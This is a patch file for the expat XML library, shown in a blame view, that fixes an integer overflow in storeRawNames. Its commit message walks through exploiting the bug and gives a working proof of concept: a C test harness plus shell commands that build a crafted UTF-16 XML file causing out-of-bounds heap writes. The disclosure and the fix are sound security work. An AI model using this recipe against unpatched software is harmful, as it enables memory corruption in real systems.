Blame SOURCES/expat-2.2.10-Prevent-integer-overflow-in-storeRawNames.patch

5d824e
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
5d824e
From: Samanta Navarro <ferivoz@riseup.net>
5d824e
Date: Tue, 15 Feb 2022 11:55:46 +0000
5d824e
Subject: [PATCH] Prevent integer overflow in storeRawNames
5d824e
5d824e
It is possible to use an integer overflow in storeRawNames for out of
5d824e
boundary heap writes. Default configuration is affected. If compiled
5d824e
with XML_UNICODE then the attack does not work. Compiling with
5d824e
-fsanitize=address confirms the following proof of concept.
5d824e
5d824e
The problem can be exploited by abusing the m_buffer expansion logic.
5d824e
Even though the initial size of m_buffer is a power of two, eventually
5d824e
it can end up a little bit lower, thus allowing allocations very close
5d824e
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
5d824e
names can be parsed which are almost INT_MAX in size.
5d824e
5d824e
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
5d824e
limitation in string pools. Having a tag name of INT_MAX/2 characters
5d824e
or more is not possible.
5d824e
5d824e
Expat can convert between different encodings. UTF-16 documents which
5d824e
contain only ASCII representable characters are twice as large as their
5d824e
ASCII encoded counter-parts.
5d824e
5d824e
The proof of concept works by taking these three considerations into
5d824e
account:
5d824e
5d824e
1. Move the m_buffer size slightly below a power of two by having a
5d824e
   short root node . This allows the m_buffer to grow very close
5d824e
   to INT_MAX.
5d824e
2. The string pooling forbids tag names longer than or equal to
5d824e
   INT_MAX/2, so keep the attack tag name smaller than that.
5d824e
3. To be able to still overflow INT_MAX even though the name is
5d824e
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
5d824e
   which only contains ASCII characters. UTF-16 always stores two
5d824e
   bytes per character while the tag name is converted to using only
5d824e
   one. Our attack node byte count must be a bit higher than
5d824e
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
5d824e
   in sum can overflow INT_MAX.
5d824e
5d824e
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
5d824e
without running into INT_MAX boundary check. The string pooling is
5d824e
able to store INT_MAX/3 as tag name because the amount is below
5d824e
INT_MAX/2 limitation. And creating the sum of both eventually overflows
5d824e
in storeRawNames.
5d824e
5d824e
Proof of Concept:
5d824e
5d824e
1. Compile expat with -fsanitize=address.
5d824e
5d824e
2. Create Proof of Concept binary which iterates through input
5d824e
   file 16 MB at once for better performance and easier integer
5d824e
   calculations:
5d824e
5d824e
```
5d824e
cat > poc.c << EOF
5d824e
 #include <err.h>
5d824e
 #include <expat.h>
5d824e
 #include <stdlib.h>
5d824e
 #include <stdio.h>
5d824e
5d824e
 #define CHUNK (16 * 1024 * 1024)
5d824e
 int main(int argc, char *argv[]) {
5d824e
   XML_Parser parser;
5d824e
   FILE *fp;
5d824e
   char *buf;
5d824e
   int i;
5d824e
5d824e
   if (argc != 2)
5d824e
     errx(1, "usage: poc file.xml");
5d824e
   if ((parser = XML_ParserCreate(NULL)) == NULL)
5d824e
     errx(1, "failed to create expat parser");
5d824e
   if ((fp = fopen(argv[1], "r")) == NULL) {
5d824e
     XML_ParserFree(parser);
5d824e
     err(1, "failed to open file");
5d824e
   }
5d824e
   if ((buf = malloc(CHUNK)) == NULL) {
5d824e
     fclose(fp);
5d824e
     XML_ParserFree(parser);
5d824e
     err(1, "failed to allocate buffer");
5d824e
   }
5d824e
   i = 0;
5d824e
   while (fread(buf, CHUNK, 1, fp) == 1) {
5d824e
     printf("iteration %d: XML_Parse returns %d\n", ++i,
5d824e
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
5d824e
   }
5d824e
   free(buf);
5d824e
   fclose(fp);
5d824e
   XML_ParserFree(parser);
5d824e
   return 0;
5d824e
 }
5d824e
EOF
5d824e
gcc -fsanitize=address -lexpat -o poc poc.c
5d824e
```
5d824e
5d824e
3. Construct specially prepared UTF-16 XML file:
5d824e
5d824e
```
5d824e
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
5d824e
echo -n '<' | dd conv=notrunc of=poc-utf8.xml
5d824e
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
5d824e
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
5d824e
```
5d824e
5d824e
4. Run proof of concept:
5d824e
5d824e
```
5d824e
./poc poc-utf16.xml
5d824e
```
5d824e
---
5d824e
 expat/lib/xmlparse.c | 7 ++++++-
5d824e
 1 file changed, 6 insertions(+), 1 deletion(-)
5d824e
5d824e
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
5d824e
index 4b43e613..f34d6ab5 100644
5d824e
--- a/lib/xmlparse.c
5d824e
+++ b/lib/xmlparse.c
5d824e
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
5d824e
   while (tag) {
5d824e
     int bufSize;
5d824e
     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
5d824e
+    size_t rawNameLen;
5d824e
     char *rawNameBuf = tag->buf + nameLen;
5d824e
     /* Stop if already stored.  Since m_tagStack is a stack, we can stop
5d824e
        at the first entry that has already been copied; everything
5d824e
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
5d824e
     /* For re-use purposes we need to ensure that the
5d824e
        size of tag->buf is a multiple of sizeof(XML_Char).
5d824e
     */
5d824e
-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
5d824e
+    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
5d824e
+    /* Detect and prevent integer overflow. */
5d824e
+    if (rawNameLen > (size_t)INT_MAX - nameLen)
5d824e
+      return XML_FALSE;
5d824e
+    bufSize = nameLen + (int)rawNameLen;
5d824e
     if (bufSize > tag->bufEnd - tag->buf) {
5d824e
       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
5d824e
       if (temp == NULL)
5d824e